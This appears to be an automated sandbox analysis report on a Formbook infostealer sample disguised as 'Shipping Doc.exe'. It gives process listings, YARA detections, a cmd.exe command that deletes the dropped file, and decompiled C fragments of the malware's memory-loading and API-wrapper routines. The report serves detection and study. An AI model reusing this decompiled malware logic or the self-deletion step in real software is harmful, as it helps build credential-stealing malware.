                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation: low

                                      General

                                      Start time: 20:40:37
                                      Start date: 03/08/2021
                                      Path: C:\Windows\explorer.exe
                                      Wow64 process (32bit): false
                                      Commandline: C:\Windows\Explorer.EXE
                                      Imagebase: 0x7ff714890000
                                      File size: 3933184 bytes
                                      MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Reputation: high

                                      General

                                      Start time: 20:41:03
                                      Start date: 03/08/2021
                                      Path: C:\Windows\SysWOW64\cscript.exe
                                      Wow64 process (32bit): true
                                      Commandline: C:\Windows\SysWOW64\cscript.exe
                                      Imagebase: 0xde0000
                                      File size: 143360 bytes
                                      MD5 hash: 00D3041E47F99E48DD5FFFEDF60F6304
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation: moderate

                                      General

                                      Start time: 20:41:06
                                      Start date: 03/08/2021
                                      Path: C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit): true
                                      Commandline: /c del 'C:\Users\user\Desktop\Shipping Doc.exe'
                                      Imagebase: 0xbd0000
                                      File size: 232960 bytes
                                      MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Reputation: high

                                      General

                                      Start time: 20:41:06
                                      Start date: 03/08/2021
                                      Path: C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit): false
                                      Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase: 0x7ff6b2800000
                                      File size: 625664 bytes
                                      MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Reputation: high

                                      Disassembly

                                      Code Analysis

                                        Executed Functions

                                        C-Code - Quality: 37%
                                        			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                        				void* _t18;
                                        				void* _t27;
                                        				intOrPtr* _t28;
                                        
                                        				_t13 = _a4;
                                        				_t28 = _a4 + 0xc48;
                                        				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                        				_t6 =  &_a32; // 0x414d42
                                        				_t12 =  &_a8; // 0x414d42
                                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                        				return _t18;
                                        			}







                                        APIs
                                        • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: BMA$BMA
                                        • API String ID: 2738559852-2163208940
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                        				char* _v8;
                                        				struct _EXCEPTION_RECORD _v12;
                                        				struct _OBJDIR_INFORMATION _v16;
                                        				char _v536;
                                        				void* _t15;
                                        				struct _OBJDIR_INFORMATION _t17;
                                        				struct _OBJDIR_INFORMATION _t18;
                                        				void* _t30;
                                        				void* _t31;
                                        				void* _t32;
                                        
                                        				_v8 =  &_v536;
                                        				_t15 = E0041C650( &_v12, 0x104, _a8);
                                        				_t31 = _t30 + 0xc;
                                        				if(_t15 != 0) {
                                        					_t17 = E0041CA70(__eflags, _v8);
                                        					_t32 = _t31 + 4;
                                        					__eflags = _t17;
                                        					if(_t17 != 0) {
                                        						E0041CCF0( &_v12, 0);
                                        						_t32 = _t32 + 8;
                                        					}
                                        					_t18 = E0041AEA0(_v8);
                                        					_v16 = _t18;
                                        					__eflags = _t18;
                                        					if(_t18 == 0) {
                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                        						return _v16;
                                        					}
                                        					return _t18;
                                        				} else {
                                        					return _t15;
                                        				}
                                        			}














                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00419D5B(HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
                                        				intOrPtr _v0;
                                        				long _t24;
                                        				void* _t34;
                                        
                                        				_t18 = _v0;
                                        				_t3 = _t18 + 0xc40; // 0xc40
                                        				E0041A960(_t34, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
                                        				_t24 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
                                        				return _t24;
                                        			}







                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                        				long _t21;
                                        				void* _t31;
                                        
                                        				_t3 = _a4 + 0xc40; // 0xc40
                                        				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                        				return _t21;
                                        			}






                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E00419F3A(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                        				long _t16;
                                        				void* _t23;
                                        
                                        				asm("adc al, [edi-0x74aa32f6]");
                                        				_t12 = _a4;
                                        				_t3 = _t12 + 0xc60; // 0xca0
                                        				E0041A960(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                        				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                        				return _t16;
                                        			}






                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                        				long _t14;
                                        				void* _t21;
                                        
                                        				_t3 = _a4 + 0xc60; // 0xca0
                                        				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                        				return _t14;
                                        			}






                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 67%
                                        			E00409A90(intOrPtr* _a4) {
                                        				intOrPtr _v8;
                                        				char _v24;
                                        				char _v284;
                                        				char _v804;
                                        				char _v840;
                                        				void* __ebx;
                                        				void* __ebp;
                                        				void* _t24;
                                        				void* _t31;
                                        				void* _t33;
                                        				void* _t34;
                                        				void* _t39;
                                        				void* _t50;
                                        				intOrPtr* _t52;
                                        				void* _t53;
                                        				void* _t54;
                                        				void* _t55;
                                        				void* _t56;
                                        
                                        				_t52 = _a4;
                                        				_t39 = 0; // executed
                                        				_t24 = E00407E80(_t52,  &_v24); // executed
                                        				_t54 = _t53 + 8;
                                        				if(_t24 != 0) {
                                        					E00408090( &_v24,  &_v840);
                                        					_t55 = _t54 + 8;
                                        					do {
                                        						E0041B810( &_v284, 0x104);
                                        						E0041BE80( &_v284,  &_v804);
                                        						_t56 = _t55 + 0x10;
                                        						_t50 = 0x4f;
                                        						while(1) {
                                        							_t31 = E00414DC0(E00414D60(_t39, _t52, _t50),  &_v284);
                                        							_t56 = _t56 + 0x10;
                                        							if(_t31 != 0) {
                                        								break;
                                        							}
                                        							_t50 = _t50 + 1;
                                        							if(_t50 <= 0x62) {
                                        								continue;
                                        							} else {
                                        							}
                                        							goto L8;
                                        						}
                                        						_t9 = _t52 + 0x14; // 0xffffe045
                                        						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                        						_t39 = 1;
                                        						L8:
                                        						_t33 = E004080C0( &_v24,  &_v840);
                                        						_t55 = _t56 + 8;
                                        					} while (_t33 != 0 && _t39 == 0);
                                        					_push( &_v24);
                                        					_push(_t52); // executed
                                        					_t34 = E00408140(_t39); // executed
                                        					if(_t39 == 0) {
                                        						asm("rdtsc");
                                        						asm("rdtsc");
                                        						_v8 = _t34 - 0 + _t34;
                                        						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                        					}
                                        					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                        					_t20 = _t52 + 0x31; // 0x5608758b
                                        					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                        					return 1;
                                        				} else {
                                        					return _t24;
                                        				}
                                        			}






















                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 69%
                                        			E004082F0(void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
                                        				char _v67;
                                        				char _v68;
                                        				void* _t14;
                                        				intOrPtr* _t15;
                                        				int _t16;
                                        				void* _t21;
                                        				long _t24;
                                        				intOrPtr* _t28;
                                        				void* _t29;
                                        				void* _t33;
                                        
                                        				_t33 = __eflags;
                                        				_t21 = __edx;
                                        				_v68 = 0;
                                        				E0041B860( &_v67, 0, 0x3f);
                                        				 *(_t21 + 3) =  *(_t21 + 3) >> 0x51;
                                        				E0041C400();
                                        				_t14 = E0040ACD0(_t33, _a4 + 0x1c,  &_v68); // executed
                                        				_t15 = E00414E20(_a4 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
                                        				_t28 = _t15;
                                        				if(_t28 != 0) {
                                        					_t24 = _a8;
                                        					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
                                        					_t35 = _t16;
                                        					if(_t16 == 0) {
                                        						_t16 =  *_t28(_t24, 0x8003, _t29 + (E0040A460(_t35, 1, 8) & 0x000000ff) - 0x40, _t16);
                                        					}
                                        					return _t16;
                                        				}
                                        				return _t15;
                                        			}














                                        APIs
                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 35%
                                        			E004082B6(void* __ebx, void* __edx, void* __esi, void* __eflags) {
                                        				intOrPtr* _t11;
                                        				intOrPtr* _t12;
                                        				void* _t14;
                                        				int _t15;
                                        				void* _t22;
                                        				long _t28;
                                        				int _t33;
                                        				void* _t37;
                                        				void* _t40;
                                        
                                        				_t12 = _t11;
                                        				if(__eflags < 0) {
                                        					 *(__edx + 3) =  *(__edx + 3) >> 0x51;
                                        					E0041C400();
                                        					_t14 = E0040ACD0(__eflags,  *((intOrPtr*)(_t37 + 8)) + 0x1c, _t37 - 0x40); // executed
                                        					_t15 = E00414E20( *((intOrPtr*)(_t37 + 8)) + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
                                        					_t33 = _t15;
                                        					__eflags = _t33;
                                        					if(_t33 != 0) {
                                        						_t28 =  *(_t37 + 0xc);
                                        						_t15 = PostThreadMessageW(_t28, 0x111, 0, 0); // executed
                                        						__eflags = _t15;
                                        						if(__eflags == 0) {
                                        							_t15 =  *_t33(_t28, 0x8003, _t37 + (E0040A460(__eflags, 1, 8) & 0x000000ff) - 0x40, _t15);
                                        						}
                                        					}
                                        					return _t15;
                                        				} else {
                                        					asm("sti");
                                        					asm("popad");
                                        					_push(_t40 + 1);
                                        					_push(0x11c6f95e);
                                        					asm("adc eax, ebp");
                                        					asm("aad 0x2f");
                                        					 *_t12 =  *_t12 + _t12;
                                        					return E0041B150(_t22) + _t12 + 0x1000;
                                        				}
                                        			}













                                        APIs
                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: 0c289ac1efd41ff397826466d6e217cae200cf09f9022ae675153661181bcfb9
                                        • Instruction ID: 5a30a9785efae46b87832583637de71dabcf6fe8cd4be8f1309a9b9d5b9787d1
                                        • Opcode Fuzzy Hash: 0c289ac1efd41ff397826466d6e217cae200cf09f9022ae675153661181bcfb9
                                        • Instruction Fuzzy Hash: 9B017D3168022836E72026545D03FFF7718AF81F29F15425EFE44B91C2DAFD680646EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E0041A1C1(void* __eax, intOrPtr _a16, WCHAR* _a20, WCHAR* _a24, struct _LUID* _a28) {
                                        				int _t14;
                                        				void* _t20;
                                        
                                        				_pop(ss);
                                        				asm("a16 outsd");
                                        				_pop(ds);
                                        				asm("sbb dword [edi-0xc], 0x5579c215");
                                        				_t11 = _a16;
                                        				E0041A960(_t20, _a16, _a16 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
                                        				_t14 = LookupPrivilegeValueW(_a20, _a24, _a28); // executed
                                        				return _t14;
                                        			}






                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: e0597f77ed8500704a64f307e558accc8d687e7de7523db9f2fc234aed8debb8
                                        • Instruction ID: 9c8c25ba341e71b75f0b78c8e7d55dd7c00a168ffaa631c088396efc0196e038
                                        • Opcode Fuzzy Hash: e0597f77ed8500704a64f307e558accc8d687e7de7523db9f2fc234aed8debb8
                                        • Instruction Fuzzy Hash: 36E06DB66102046BCB24DF99EC80ED7B768EF45B60F118159FD0C6B241CA35A956CBB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E0041A062(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                        				char _t14;
                                        				void* _t19;
                                        
                                        				asm("repne sub eax, 0x55e5f672");
                                        				_t11 = _a4;
                                        				_t5 = _t11 + 0xc74; // 0xc74
                                        				E0041A960(_t19, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                        				_t14 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                        				return _t14;
                                        			}






                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        • Opcode ID: fbb7c8d68295ea8239bce943f6e1290c3342412f533dedfa1f2e41b5366881ee
                                        • Instruction ID: 3f40c745a364dc1f8357f8d2923015dff7255f908326c8a2410d5bab0ff71eba
                                        • Opcode Fuzzy Hash: fbb7c8d68295ea8239bce943f6e1290c3342412f533dedfa1f2e41b5366881ee
                                        • Instruction Fuzzy Hash: 55E0EDB1200204AFCB18DF94CC49EEB3368EF48310F054158FD489B252D630E954CFE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                        				char _t10;
                                        				void* _t15;
                                        
                                        				_t3 = _a4 + 0xc74; // 0xc74
                                        				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                        				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                        				return _t10;
                                        			}






                                        APIs
                                        • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID:
                                        • API String ID: 3298025750-0
                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                        • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                        • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                        				void* _t10;
                                        				void* _t15;
                                        
                                        				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                        				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                        				return _t10;
                                        			}






                                        APIs
                                        • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                        • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                        • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                        				int _t10;
                                        				void* _t15;
                                        
                                        				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                        				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                        				return _t10;
                                        			}






                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                        • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                        • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0041A0B0(intOrPtr _a4, int _a8) {
                                        				void* _t10;
                                        
                                        				_t5 = _a4;
                                        				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                        				ExitProcess(_a8);
                                        			}





                                        APIs
                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:
                                        • API String ID: 621844428-0
                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                        • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                        • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        C-Code - Quality: 73%
                                        			E00409E40(signed int* _a4) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				signed int _v16;
                                        				char _v304;
                                        				signed char* _t277;
                                        				signed int* _t278;
                                        				signed int _t279;
                                        				signed int _t285;
                                        				signed int _t288;
                                        				signed int _t292;
                                        				signed int _t295;
                                        				signed int _t299;
                                        				signed int _t303;
                                        				signed int _t305;
                                        				signed int _t311;
                                        				signed int _t318;
                                        				signed int _t320;
                                        				signed int _t323;
                                        				signed int _t325;
                                        				signed int _t334;
                                        				signed int _t340;
                                        				signed int _t341;
                                        				signed int _t346;
                                        				signed int _t353;
                                        				signed int _t357;
                                        				signed int _t358;
                                        				signed int _t362;
                                        				signed int _t365;
                                        				signed int _t369;
                                        				signed int _t370;
                                        				signed int _t399;
                                        				signed int _t404;
                                        				signed int _t410;
                                        				signed int _t413;
                                        				signed int _t420;
                                        				signed int _t423;
                                        				signed int _t432;
                                        				signed int _t434;
                                        				signed int _t437;
                                        				signed int _t445;
                                        				signed int _t459;
                                        				signed int _t462;
                                        				signed int _t463;
                                        				signed int _t464;
                                        				signed int _t470;
                                        				signed int _t478;
                                        				signed int _t479;
                                        				signed int* _t480;
                                        				signed int* _t481;
                                        				signed int _t488;
                                        				signed int _t491;
                                        				signed int _t496;
                                        				signed int _t499;
                                        				signed int _t502;
                                        				signed int _t505;
                                        				signed int _t506;
                                        				signed int _t510;
                                        				signed int _t522;
                                        				signed int _t525;
                                        				signed int _t532;
                                        				void* _t536;
                                        
                                        				_t481 = _a4;
                                        				_t353 = 0;
                                        				_t2 =  &(_t481[7]); // 0x1b
                                        				_t277 = _t2;
                                        				do {
                                        					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                                        					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
